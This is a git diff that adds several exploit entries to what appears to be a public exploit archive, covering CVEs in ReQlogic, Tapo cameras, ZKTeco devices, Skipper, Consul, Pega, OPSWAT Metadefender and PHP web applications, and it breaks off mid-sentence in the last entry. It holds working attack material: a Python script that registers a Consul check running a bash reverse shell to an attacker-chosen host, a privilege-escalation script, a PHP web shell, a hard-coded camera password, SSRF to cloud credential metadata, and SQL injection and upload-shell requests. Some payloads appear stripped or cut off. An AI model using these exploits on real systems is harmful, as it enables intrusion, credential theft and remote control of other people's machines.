diff --git a/exploits/aspx/webapps/51118.txt b/exploits/aspx/webapps/51118.txt new file mode 100644 index 000000000..1a3138d00 --- /dev/null +++ b/exploits/aspx/webapps/51118.txt @@ -0,0 +1,23 @@ +# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) +# Date: 9 October 2022 +# Exploit Author: Okan Kurtulus +# Vendor Homepage: https://reqlogic.com +# Version: 11.3 +# Tested on: Linux +# CVE : 2022-41441 + +# Proof of Concept: +1- Install ReQlogic v11.3 +2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3 +3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters. + +#XSS Payload: + + +#Affected Prameters +POBatch +WaitDuration + +#Final URLs +http://20.36.214.225:81/ProcessWait.aspx?POBatch=&WaitDuration=3 +http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration= \ No newline at end of file diff --git a/exploits/hardware/remote/51107.txt b/exploits/hardware/remote/51107.txt new file mode 100644 index 000000000..cbddf752f --- /dev/null +++ b/exploits/hardware/remote/51107.txt @@ -0,0 +1,16 @@ +# Exploit Title: Tapo C310 RTSP server v1.3.0- Unauthorised Video Stream Access +# Date: 19th July 2022 +# Exploit Author: dsclee1 +# Vendor Homepage: tp-link.com +# Software Link: http://download.tplinkcloud.com/firmware/Tapo_C310v1_en_1.3.0_Build_220328_Rel.64283n_u_1649923652150.bin +# Version: 1.3.0 +# Tested on: Linux – running on camera +# CVE : CVE-2022-37255 + +These Tapo cameras work via an app. There is a facility on the app to set up a “Camera Account”, which adds user details for the RTSP server. Unfortunately if you don’t set up the user details on versions 1.3.0 and below there are default login details. I sourced these from the “cet” binary on the camera. + +You can gain unauthorised access to the RTSP stream using the following user details: + +User: --- + +Password: TPL075526460603 \ No newline at end of file diff --git a/exploits/jsp/webapps/51112.txt b/exploits/jsp/webapps/51112.txt new file mode 100644 index 000000000..337691e94 --- /dev/null +++ b/exploits/jsp/webapps/51112.txt @@ -0,0 +1,232 @@ +# Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication +# Exploit Author: RedTeam Pentesting GmbH +# CVE: CVE-2022-42953 +Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface + +The ZKTeco time attendance device does not require authentication to use the +web interface, exposing the database of employees and their credentials. + + +Details +======= + +Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM +Affected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210) +Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210) +Vulnerability Type: Missing Authentication +Security Risk: medium +Vendor URL: https://zkteco.eu/company/history +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003 +Advisory Status: published +CVE: CVE-2022-42953 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953 + + +Introduction +============ + +"Time attendance and workforce management is an integrated set of +processes that an institution uses to optimize the productivity of its +employees on the individual, departmental, and entity-wide levels. +ZKTeco has been at the forefront of time attendance solutions for the +last 30 years, integrating advanced biometric technologies with +innovative and versatile terminals." (from company website) + + +More Details +============ + + +The ZKTeco ZEM/ZMM device allows to store a list of users and their credentials +which may be used to log into the device to prove the users' attendance. These +credentials can either be a PIN, a card for a variety of card readers, or a +fingerprint. The user list can be managed through the web interface. + +When opening the web interface, for example on http://192.0.2.1/, +the web server of the device sends a Set-Cookie header for a cookie with +name and value similar to the following: + +----------------------------------------------------------------------- +Set-Cookie: SessionID=1624553126; path=/; +----------------------------------------------------------------------- + +It was determined that the value of the cookie is roughly the number of +seconds since January 1, 1970. Since the value has a constant offset, +that might allow attackers to guess the cookie value. After setting the +cookie, the webserver redirects the browser to "/csl/login". The login +form provided at this URL has its form action set to "/csl/check". If +the user provides wrong credentials, the web server responds with an +error message. If the user provides correct credentials, the server +responds with a frameset. + +In this frameset various options are available, for example a user list. +The list contains a link titled "Options" for each user item which +references a URL similar to the following + +http://192.0.2.1/csl/user?did=0&uid=123 + +Additionally, backups of all settings of the device can be downloaded +from the backup page. The request to do so looks similar to the +following: +----------------------------------------------------------------------- +POST /form/DataApp HTTP/1.1 +Host: 192.0.2.1 +User-Agent: Mozilla/5.0 +Cookie: SessionID=1624553126 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 7 +Origin: http://192.0.2.1 +Referer: http://192.0.2.1/form/Device?act=11 + +style=1 +----------------------------------------------------------------------- + +When the value "1" is given for the field named "style", the web server +responds with the file "device.dat" (corresponding to the option "Backup +System Data" in the web interface), for all other values the server +responds with the file "data.dat" (corresponding to the option "Backup +User Data" in the web interface). Both files can not only be requested +using HTTP-POST, but also using HTTP-GET with the following URLs: + +http://192.0.2.1/form/DataApp?style=1 +http://192.0.2.1/form/DataApp?style=0 + +Both files are - even though it's not obvious from the filename - +compressed tar archives. They can be extracted in the following way: + +----------------------------------------------------------------------- +$ mv data.dat data.tgz +$ tar xvzf data.tgz +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/group.dat +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat +rwxrwxrwx 500/513 10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat +rwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat +rwxrwxrwx 500/513 19456 2005-05-05 07:05 mnt/mtdblock/template.dat +rw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/timezone.dat +rwxrwxrwx 500/513 1372 2005-05-05 07:25 mnt/mtdblock/user.dat +rwxr-xr-x root/root 120 1970-01-01 01:08 mnt/mtdblock/data/alarm.dat +rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat +rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/group.dat +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat +rwxr-xr-x root/root 54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat +rwxr-xr-x root/root 33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat +rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat +rwxr-xr-x root/root 660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat +rwxrwxrwx 500/513 0 2013-05-04 01:28 mnt/mtdblock/data/template.dat +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat +rwxr-xr-x root/root 952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat +rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/user.dat +rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat +----------------------------------------------------------------------- + +In this archive, the file "mnt/mtdblock/templatev10.dat" will likely +contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains +the user database. The user database contains 72 byte user records, each +containing the privilege level, the PIN, the name of the user, data +stored on external authentication tokens like cards, and the group of +the user. + +While the cookie value might be guessable, it is not used for +authentication purposes. An attacker with knowledge of the +corresponding URLs could access the user detail view or the backup +without any authentication. + + +Proof of Concept +================ + +http://192.0.2.1/form/DataApp?style=1 +http://192.0.2.1/form/DataApp?style=0 +http://192.0.2.1/csl/user?did=0&uid=123 + + +Workaround +========== + +Network access to the device should be limited to trustworthy persons. +This might be hard to implement if the device is installed in a public +space, especially if it is used for access control, too. + + +Fix +=== + +Currently, it is not known whether a newer version might fix this issue. +Due to the age of the product, the vendor might decide not to create a +fix at all. + + +Security Risk +============= + +Attackers with network access to a ZKTeco ZEM/ZMM time attendance device +can get access to employee data, including the credentials used for +accessing the time attendance device. If these credentials are used for +other purposes than time attendance, such as physical access control, +attackers might use them to gain access to protected areas. The actual +risk estimate varies wildly with the kind of access control system in +place and whether network access to the device is prevented by other +means, such as nearby security guards. For this reason, missing +authentication to the ZEM/ZMM web interface is estimated to pose a medium +risk. This estimate might need to be adjusted to the specific use case +of the device. + + +Timeline +======== + +2021-06-24 Vulnerability identified +2021-07-12 Customer approved disclosure to vendor +2021-07-16 Vendor notified +2021-08-20 Vendor provides fixed firmware +2022-09-29 Customer approved release of advisory +2022-10-10 CVE ID requested +2022-10-15 CVE ID assigned +2022-10-24 Advisory published + + +References +========== + +https://zkteco.eu/company/history + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://jobs.redteam-pentesting.de/ + + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Alter Posthof 1 Fax : +49 241 510081-99 +52062 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/multiple/remote/51111.txt b/exploits/multiple/remote/51111.txt new file mode 100644 index 000000000..a96d470dd --- /dev/null +++ b/exploits/multiple/remote/51111.txt @@ -0,0 +1,31 @@ +#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF) +#Date: 24/10/2022 +#Exploit Author: Hosein Vita & Milad Fadavvi +#Vendor Homepage: https://github.com/zalando/skipper +#Software Link: https://github.com/zalando/skipper +#Version: < v0.13.237 +#Tested on: Linux +#CVE: CVE-2022-38580 + + +Summary: + +Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request. + + +Proof Of Concept: + +1- Add header "X-Skipper-Proxy" to your request +2- Add the aws metadata to the path + +GET /latest/meta-data/iam/security-credentials HTTP/1.1 +Host: yourskipperdomain.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 +X-Skipper-Proxy: http://169.254.169.254 +Connection: close + + + + +Reference: +https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2 \ No newline at end of file diff --git a/exploits/multiple/remote/51117.txt b/exploits/multiple/remote/51117.txt new file mode 100644 index 000000000..8dfec232e --- /dev/null +++ b/exploits/multiple/remote/51117.txt @@ -0,0 +1,24 @@ +# Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE) +# Date: 26/10/2022 +# Exploit Author: GatoGamer1155, 0bfxgh0st +# Vendor Homepage: https://www.consul.io/ +# Description: Exploit for gain reverse shell on Remote Command Execution via API +# References: https://www.consul.io/api/agent/service.html +# Tested on: Ubuntu Server +# Software Link: https://github.com/hashicorp/consul + +import requests, sys + +if len(sys.argv) < 6: + print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} \n") + exit(1) + +target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register" +headers = {"X-Consul-Token": f"{sys.argv[5]}"} +json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80} + +try: + requests.put(target, headers=headers, json=json) + print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n") +except: + print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n") \ No newline at end of file diff --git a/exploits/multiple/webapps/51099.txt b/exploits/multiple/webapps/51099.txt new file mode 100644 index 000000000..5c2d30415 --- /dev/null +++ b/exploits/multiple/webapps/51099.txt @@ -0,0 +1,38 @@ +# Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 20 Oct 2022 +# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit) +# Vendor Homepage: www.pega.com +# Software Link: Not Available +# Version: 8.1.0 on-premise and higher, up to 8.3.7 +# Tested on: Red Hat Enterprise 7 +# CVE : CVE-2022-24082 + +;Dumping RMI registry: +nmap -sT -sV --script rmi-dumpregistry -p 9999 + +;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1 +:) +;Verifying that the is indeed open (it gives 127.0.0.1 in the RMI +dump, but actually listens on the network as well): +nmap -sT -sV -p + +;Exploitation requires: +;- JVM +;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet) +;- jython +;Installing mbean for remote code execution +java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass 9999 install random_password http://:6666 6666 + +;Execution of commands id & ifconfig +java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass 9999 command random_password "id;ifconfig" + +;More details: +https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316 + + +Kind Regards, +Marcin Wolak \ No newline at end of file diff --git a/exploits/multiple/webapps/51113.py b/exploits/multiple/webapps/51113.py new file mode 100755 index 000000000..c146bc874 --- /dev/null +++ b/exploits/multiple/webapps/51113.py @@ -0,0 +1,51 @@ +# Exploit Title: OPSWAT Metadefender Core - Privilege Escalation +# Date: 24 October 2022 +# Exploit Author: Ulascan Yildirim +# Vendor Homepage: https://www.opswat.com/ +# Version: Metadefender Core 4.21.1 +# Tested on: Windows / Linux +# CVE : CVE-2022-32272 +# ============================================================================= +# This is a PoC for the Metadefender Core Privilege escalation vulnerability. +# To use this PoC, you need a Username & Password. +# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges. +# ============================================================================= + +#!/usr/bin/env python3 +import requests +import json +from getpass import getpass + +url = input("Enter URL in this Format (http://website.com): ") +username = input("Username: ") +password = getpass("Password: ") + +url_login = url+'/login' +url_user = url+'/user' +logindata = {"user":username,"password":password} + +## Get the OMS_CSRF_TOKEN & session cookie +response_login = requests.post(url_login, json = logindata).json() +json_str = json.dumps(response_login) +resp = json.loads(json_str) +token = resp['oms_csrf_token'] +session = resp['session_id'] + +## Prepare Header & Cookie +headers = { + "oms_csrf_token": token, +} +cookie = { + "session_id_ometascan": session +} + +## Set Payload to get Admin role +payload = '{"roles": ["1"]}' + +response = requests.put(url_user,headers=headers,cookies=cookie,data=payload) +print("Response status code: "+str(response.status_code)) + +if response.status_code == 200: + print("Expolit Successful!") +else: + print("Exploit Unsuccessful") \ No newline at end of file diff --git a/exploits/php/webapps/51098.txt b/exploits/php/webapps/51098.txt new file mode 100644 index 000000000..81f94980c --- /dev/null +++ b/exploits/php/webapps/51098.txt @@ -0,0 +1,136 @@ +## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE) +## Exploit Author: nu11secur1ty +## Date: 10.12.2022 +## Vendor: https://code4berry.com/projects/beautysalon.php +## Software: https://code4berry.com/project%20downloads/beautysalon_download.php +## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt + +## Description: +The parameter `userimage` from Beauty-salon-2022 suffers from Web +Shell-File Upload - RCE. +NOTE: The user permissions of this system are not working correctly, and +the function is not sanitizing well. +The attacker can use an already created account from someone who controls +this system and he can upload a very malicious file by using this +vulnerability, +or more precisely (no sanitizing of function for edit image), for whatever +account, then he can execute it from anywhere on the external network. + +Status: HIGH Vulnerability + +[+] Exploit: + +```php + + + + + + + + + + + + + +PHP Web Shell Ver 4.0 by nu11secur1ty + + + +WebShell's Location = http://

+ +HTTP_HOST =
+REQUEST_URI =
+ +
+ +
+ + +
+ -----------------'; +echo '
';
+foreach($result as $print)
+{
+$print = str_replace('<','<',$print);
+echo $print . '
';
+}
+echo '
'; +} +else echo '
'; +?> + +
+ +
+ +
+The file was uploaded successfully!!'; +else +echo '
File Upload was failed...
'; +} +?> + + +``` + + +# Proof and Exploit: +[href](https://streamable.com/ewdmoh) + +# m0e3: +[href]( +https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html +) + + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51101.txt b/exploits/php/webapps/51101.txt new file mode 100644 index 000000000..1e2a77bdd --- /dev/null +++ b/exploits/php/webapps/51101.txt @@ -0,0 +1,82 @@ +# Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities +# Discovery by: Rafael Pedrero +# Discovery Date: 2021-01-31 +# Vendor Homepage: https://www.youphptube.com/ +# Software Link : https://www.youphptube.com/ +# Tested Version: 7.8 +# Tested on: Windows 7, 10 using XAMPP + +# Vulnerability Type: LFI + Path Traversal + +CVSS v3: 7.5 +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N +CWE: CWE-829, CWE-22 + +Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory +traversal and Local File Inclusion through the parameter in an +/?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an +include_once in locale/function.php page. + +Proof of concept: + +To detect: http://localhost/youphptube/index.php?lang=) + +An error is generated: + +Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0 +in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47 + +In function.php page, we can see: + +// filter some security here +if (!empty($_GET['lang'])) { + $_GET['lang'] = str_replace(array("'", '"', """, "'"), +array('', '', '', ''), xss_esc($_GET['lang'])); +} + +if (empty($_SESSION['language'])) { + $_SESSION['language'] = $config->getLanguage(); +} +if (!empty($_GET['lang'])) { + $_GET['lang'] = strip_tags($_GET['lang']); + $_SESSION['language'] = $_GET['lang']; +} +@include_once +"{$global['systemRootPath']}locale/{$_SESSION['language']}.php"; + + +The parameter "lang" can be modified and load a php file in the server. + + +In Document root: /phpinfo.php with this content: + + + + +To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo + +Note: phpinfo without ".php". + +The new Path is: +@include_once "{$global['systemRootPath']}locale/../../phpinfo.php"; + +And you can see the PHP information into the browser. + + + +# Vulnerability Type: reflected Cross-Site Scripting (XSS) + +CVSS v3: 6.5 +CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-79 + +Vulnerability description: YouPHPTube 7.8 and before, does not sufficiently +encode user-controlled inputs, resulting in a reflected Cross-Site +Scripting (XSS) vulnerability via the +//signup?redirectUri=, in redirectUri +parameter. + +Proof of concept: + +http://localhost/ +/signup?redirectUri='"()%26%25 \ No newline at end of file diff --git a/exploits/php/webapps/51103.txt b/exploits/php/webapps/51103.txt new file mode 100644 index 000000000..bdbd8e1ca --- /dev/null +++ b/exploits/php/webapps/51103.txt @@ -0,0 +1,343 @@ +# Exploit Title: Online shopping system advanced 1.0 - Multiple +Vulnerabilities +# Discovery by: Rafael Pedrero +# Discovery Date: 2020-09-24 +# Vendor Homepage: +https://github.com/PuneethReddyHC/online-shopping-system-advanced +# Software Link : +https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip +# Tested Version: 1.0 +# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache + +php 5.X/7.X + MySQL + +# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7 +vulnerabilities + +# Vulnerability Type: SQL Injection - #1 + +CVSS v3: 9.8 +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +CWE: CWE-89 + +Vulnerability description: Online shopping system advanced 1.0 allows SQL +injection via the admin/edit_user.php, user_id parameter. + +Proof of concept: + +Save this content in a file: + +POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Content-Type: multipart/form-data; +boundary=---------------------------120411781422335 +Content-Length: 489 +Origin: http://127.0.0.1 +Connection: keep-alive +Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25 +Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 +Upgrade-Insecure-Requests: 1 +Host: 127.0.0.1 + +-----------------------------120411781422335 +Content-Disposition: form-data; name="user_id" + +25 +-----------------------------120411781422335 +Content-Disposition: form-data; name="email" + +otheruser@gmail.com +-----------------------------120411781422335 +Content-Disposition: form-data; name="password" + +puneeth@123 +-----------------------------120411781422335 +Content-Disposition: form-data; name="btn_save" + + +-----------------------------120411781422335-- + + +And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id + +(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to +keep testing the others (if any)? [y/N] +sqlmap identified the following injection point(s) with a total of 115 +HTTP(s) requests: +--- +Parameter: MULTIPART user_id ((custom) POST) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: -----------------------------120411781422335 +Content-Disposition: form-data; name="user_id" + +25' AND SLEEP(5) AND 'HGWF'='HGWF +-----------------------------120411781422335 +Content-Disposition: form-data; name="email" + +otheruser@gmail.com +-----------------------------120411781422335 +Content-Disposition: form-data; name="password" + +puneeth@123 +-----------------------------120411781422335 +Content-Disposition: form-data; name="btn_save" + + +-----------------------------120411781422335-- +--- +[16:25:28] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.38, PHP 5.6.40 +back-end DBMS: MySQL >= 5.0.12 + + +# Vulnerability Type: SQL Injection - #2 + +CVSS v3: 9.8 +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +CWE: CWE-89 + +Vulnerability description: Online shopping system advanced 1.0 allows SQL +injection via the action.php, proId parameter. + +Proof of concept: + +Save this content in a file: + +POST http://127.0.0.1/online/action.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 49 +Origin: http://127.0.0.1 +Connection: keep-alive +Referer: http://127.0.0.1/online/ +Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 +Host: 127.0.0.1 + +addToCart=1&proId=70 + + +And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId + +POST parameter 'proId' is vulnerable. Do you want to keep testing the +others (if any)? [y/N] +sqlmap identified the following injection point(s) with a total of 72 +HTTP(s) requests: +--- +Parameter: proId (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv +--- +[16:03:38] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.38, PHP 5.6.40 +back-end DBMS: MySQL >= 5.0.12 + + +# Vulnerability Type: Remote Command Execution (RCE) + +CVSS v3: 9.8 +CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H +CWE: CWE-434 + +Vulnerability description: File Restriction Bypass vulnerabilities were +found in Online shopping system advanced v1.0. This allows for an +authenticated user to potentially obtain RCE via webshell. + +Proof of concept: + +1. Go the add product >> (admin/add_product.php) +2.- Select product image and load a valid image. +3. Turn Burp/ZAP Intercept On +4. Select webshell - ex: shell.php +5. Alter request in the upload... + Update 'filename' to desired extension. ex: shell.php + Not neccesary change content type to 'image/png' + +Example exploitation request: + +==================================================================================================== + +POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Content-Type: multipart/form-data; +boundary=---------------------------184982084830387 +Content-Length: 960 +Origin: http://127.0.0.1 +Connection: keep-alive +Referer: http://127.0.0.1/online/admin/add_product.php +Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 +Upgrade-Insecure-Requests: 1 +Host: 127.0.0.1 + +-----------------------------184982084830387 +Content-Disposition: form-data; name="product_name" + +demo2 +-----------------------------184982084830387 +Content-Disposition: form-data; name="details" + +demo2 +-----------------------------184982084830387 +Content-Disposition: form-data; name="picture"; filename="shell.php" +Content-Type: image/gif + +";system($_REQUEST['cmd']);echo "" ?> +-----------------------------184982084830387 +Content-Disposition: form-data; name="price" + +1 +-----------------------------184982084830387 +Content-Disposition: form-data; name="product_type" + +1 +-----------------------------184982084830387 +Content-Disposition: form-data; name="brand" + +1 +-----------------------------184982084830387 +Content-Disposition: form-data; name="tags" + +Summet +-----------------------------184982084830387 +Content-Disposition: form-data; name="submit" + + +-----------------------------184982084830387-- + +==================================================================================================== + +6. To view the webshell path go to Product List (admin/cosmetics_list.php) +7. Send the request and visit your new webshell + Ex: +http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami + nt authority\system + +# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1 + +CVSS v3: 6.5 +CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-79 + +Vulnerability description: Online shopping system advanced v1.0, does not +sufficiently encode user-controlled inputs, resulting in a stored +Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in +multiple parameter. + +Proof of concept: + +Stored: + +POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Content-Type: multipart/form-data; +boundary=---------------------------120411781422335 +Content-Length: 496 +Origin: http://127.0.0.1 +Connection: keep-alive +Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25 +Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 +Upgrade-Insecure-Requests: 1 +Host: 127.0.0.1 + +-----------------------------120411781422335 +Content-Disposition: form-data; name="user_id" + +25 +-----------------------------120411781422335 +Content-Disposition: form-data; name="email" + +otheruser@gmail.com +-----------------------------120411781422335 +Content-Disposition: form-data; name="password" + + +-----------------------------120411781422335 +Content-Disposition: form-data; name="btn_save" + + +-----------------------------120411781422335-- + + +# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2 + +CVSS v3: 6.5 +CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-79 + +Vulnerability description: Online shopping system advanced v1.0, does not +sufficiently encode user-controlled inputs, resulting in a stored +Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in +multiple parameter. + +Proof of concept: + +Stored: + +POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Content-Type: application/x-www-form-urlencoded +Content-Length: 192 +Origin: http://127.0.0.1 +Connection: keep-alive +Referer: http://127.0.0.1/online/admin/add_user.php +Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 +Upgrade-Insecure-Requests: 1 +Host: 127.0.0.1 + +first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save= + + +# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1 + +CVSS v3: 6.1 +CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-79 + +Vulnerability description: Online shopping system advanced v1.0, does not +sufficiently encode user-controlled 